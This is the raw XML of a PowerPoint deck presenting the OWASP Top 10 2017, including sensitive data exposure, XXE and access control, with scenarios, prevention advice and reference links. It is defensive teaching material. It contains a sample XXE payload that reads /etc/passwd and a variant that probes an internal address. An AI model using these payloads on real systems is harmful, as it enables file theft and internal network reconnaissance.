<file path=ppt/slides/_rels/slide9.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://&#160;Authentication" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml" /><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwords" TargetMode="External" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#5:_Implement_Identity_and_Authentication_Controls" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentica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Session_Management_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/384.html" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_Identity_Management" TargetMode="External" /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_stuffing" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forgot_Password_Cheat_Shee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dirty="1" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Топ-10 OWASP - 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Десять самых критичных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>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application encrypts credit card numbers in a database using automatic database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However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text.</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site doesn't use or enforce TLS for all pages or supports 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monitors network traffic  (e.g. at an insecure wireless network), downgrades connections from HTTPS to HTTP, intercepts requests, and steals the user's session cookie.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then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data.</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the above they could alter all transported data, e.g. the recipient of a money transfer.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password database uses unsalted or simple hashes to store everyone's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file upload flaw allows an attacker to retrieve the password database.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All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes.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Hashes generated by simple or fast hash functions may be cracked by GPUs, even if they were salted.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such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Is any data transmitted in clear text?</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This concerns protocols such as HTTP, SMTP, and FTP.</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External internet traffic is especially dangerous.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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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See ASVS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Crypto (V7)</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5"/>
              </a:rPr>
              <a:t>Data Prot (V9)</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8"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Protect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OWASP Application Security Verification Standard (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>V7</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5"/>
              </a:rPr>
              <a:t>9</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6"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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9"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Cheat Sheet:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" u="sng" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Transport Layer Protection</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>User Privacy Protection</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1"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheets:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" u="sng" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" u="sng" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Password</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12"/>
              </a:rPr>
              <a:t>Cryptographic Storage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Security Headers Project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4"/>
              </a:rPr>
              <a:t>Cheat Sheet:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>HSTS</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5"/>
              </a:rPr>
              <a:t>OWASP Testing Guide:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Testing for weak cryptography</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7"/>
              </a:rPr>
              <a:t>CWE-220:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>Exposure of sens. information through data queries</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7"/>
              </a:rPr>
              <a:t>CWE-310:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" u="sng" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" u="sng" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>Cryptographic Issues</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18"/>
              </a:rPr>
              <a:t>CWE-311:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" u="sng" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" u="sng" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>Missing Encryption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9"/>
              </a:rPr>
              <a:t>CWE-312:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Cleartext Storage of Sensitive Information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0"/>
              </a:rPr>
              <a:t>CWE-319:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>Cleartext Transmission of Sensitive Information</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21"/>
              </a:rPr>
              <a:t>CWE-326:</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21"/>
              </a:rPr>
              <a:t>CWE-327:</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Broken/Risky Crypto</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2"/>
              </a:rPr>
              <a:t>CWE-359:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>Exposure of Private Information (Privacy Violation)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Classify data processed, stored, or transmitted by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Don’t store sensitive data unnecessarily.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Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation.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Data that is not retained cannot be stolen.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Enforce encryption using directives like HTTP Strict Transport Security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>HSTS</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ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>Argon2</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4"/>
              </a:rPr>
              <a:t>scrypt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5"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId26"/>
              </a:rPr>
              <a:t>PBKDF2</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A3</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1100" i="0" u="none" strike="noStrike"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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rather than directly attacking crypto, attackers steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser.</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A manual attack is generally required.</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Previously </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>retrieved password databases</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> could be brute forced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>by Graphics Processing Units (GPUs).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Over the last few years, this has been the most common impactful attack.</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The most common flaw is simply not encrypting sensitive data.</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When crypto is employed, weak key generation and management, and weak algorithm, protocol and cipher usage is common, particularly for weak password hashing storage techniques.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For data in transit, server side weaknesses are mainly easy to detect, but hard for data at rest.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">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Failure frequently compromises all data that should have been protected.</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Typically, this information includes sensitive personal information (PII) data such as health records, creden-tials, personal data, and credit cards, which often require protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</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r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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XXE occurs in a lot of unexpected places, including deeply nested dependencies.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 easiest way is to upload a malicious XML file, if accepted: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attempts to extract data from the server:</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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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 &lt;!DOCTYPE foo [</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&lt;!ELEMENT foo ANY &gt;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"file:///etc/passwd" &gt;]&gt;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&lt;foo&gt;&amp;xxe;&lt;/foo&gt;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probes the server's private network by changing the above ENTITY line to:</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"https://192.168.1.1/private" &gt;]&gt;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attempts a denial-of-service attack by including a potentially endless file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>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ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>document type definitions (DTDs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> enabled.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As the exact mechanism for disabling DTD processing varies by processor, it is good practice to consult a reference such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention’</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SAML uses XML for identity assertions, and may be vulnerable.</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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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dirty="1" sz="90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Testing for XML Injection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9"/>
              </a:rPr>
              <a:t>OWASP XXE Vulnerability</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5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>XXE Prevention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XML Security</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CWE-611:</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Improper Restriction of XXE</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Billion Laughs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SAML Security XML External Entity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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Developer training is essential to identify and mitigate XXE.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Besides that, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reventing XXE requires:</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Use dependency checkers.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Update SOAP to SOAP 1.2 or higher.</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ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention'</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Implement positive ("whitelisting") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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sz="90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p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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A4</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dirty="1"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ru-RU" dirty="1" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin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ru-RU" dirty="1"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7"/>
                        </a:rPr>
                        <a:t>DAST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require additional manual steps to detect and exploit this issue.</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Manual testers need to be trained in how to test for XXE, as it not commonly tested as of 2017.</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ru-RU" dirty="1"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ru-RU" dirty="1"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unverified data in a SQL call that is accessing account information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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pstmt.setString(1, request.getParameter("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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ResultSet results = pstmt.executeQuery( );</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not properly verified, the attacker can access any user's account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">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simply force browses to target URLs.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Admin rights are required for access to the admin page.</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http://example.com/app/getappInfo</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t>
            </a:r>
            <a:r>
